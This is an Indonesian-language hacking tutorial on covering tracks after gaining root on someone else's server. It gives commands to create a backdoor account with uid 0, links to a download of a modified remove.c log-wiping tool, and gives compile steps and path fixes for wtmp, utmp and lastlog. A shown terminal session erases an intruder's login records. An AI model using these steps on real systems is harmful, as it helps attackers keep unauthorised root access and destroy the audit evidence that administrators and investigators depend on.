Perhatian : Artikel bagaimana cara menghapus jejak ini diambil dari situs kecoak elektronik dengan penulis cbug, tapi dalam kali ini kami akan mencoba sedikit untuk memodifikasi kesalahan yang terdapat didalam remove.c sebelumnya source code remove.c tidak bisa [sering error] kalau digunakan --------------------------------------------------------------------------------- Setelah kamu berhasil mendapatkan root diserver target, maka yang kamu lakukan setelah ini adalah mengapus log dan memasang backdoor. Untuk menghapus log yang diperlukan adalah account diserver target sekaligus account sebagai root dengan menggunakan acces su exp: useradd -d /home/user -g 0 -u 0 -s /bin/bash user passwd -d user passwd user Itu adalah salah satu contoh cara membuat account dengan acces su Yang menarik didalam source code remove.c adalah ditemukan sedikit 'kelalaian' yaitu kadangkala letak wtmp utmp dan lastlog tidak sesuai yang ada didalam remove.c nomad nah untuk lebih enaknya kamu download ajah source code remove.c yang ada di http://radikal.org/remove.c yang sudah disempurnakan. Adapun cara mengcompile sama dengan yang ada di tutorial kecoak yakni gcc -o remove remove.c -DGENERIC Untuk remove.c yang belum diedit perlu diperhatikan bagian bagian dari remove.c dari artikel yang ditulis cbug ini #ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */ #define WTMP "/var/adm/wtmp" #define UTMP "/var/adm/utmp" #define LASTLOG "/var/adm/lastlog" #endif Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama, misalnya distro Slackware menaruh file2 tsb diatas di: #define WTMP "/var/log/wtmp" #define UTMP "/var/run/utmp" #define LASTLOG "/var/log/lastlog" Jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c Kamu bisa gunakan perintah : find / -name wtmp -print find / -name utmp -print find / -name lastlog -print atau whereis wtmp whereis utmp whereis lastlog Kemudian ganti posisi file2 tersebut di remove.c sesuai dengan hasil diatas. Perhatikan juga proses compile remove.c !!! kecoak:/home/cbug/tools# gcc remove.c -o remove -DGENERIC remove.c: In function `main': remove.c:50: warning: return type of `main' is not `int' /tmp/ccZVzySI.o: In function `main': /tmp/ccZVzySI.o(.text+0xb4): the `gets' function is dangerous and should not be used. Disini terdapat WARNING! tapi bukan berarti ERROR, cuek ajah Perhatikan juga cara ceck log yang tersisa kecoak:/home/cbug/tools# lastlog | grep cbug cbug tty2 Sat Mar 11 11:32:42 -0800 2000 Menjalankan remove.c kecoak:/home/cbug/tools# ./remove cbug REMOVE by Simple Nomad Nomad Mobile Research Centre (c) 1997 Found 549 record(s) for user cbug Will attempt a lastlog cleanup by default. # - remove last # records from utmp/wtmp a - remove (a)ll records from utmp/wtmp q - (q)uit program Enter selection -> Hapus record terakhir (ketik #), atau boleh juga semua (a) :P Enter selection -> # REMOVE cleaned up 0 record(s) from /var/log/wtmp REMOVE cleaned up 0 record(s) from /var/run/utmp REMOVE cleaned up /var/log/lastlog Cek last log yang ada kecoak:/home/cbug/tools# lastlog | grep cbug cbug **Never logged in**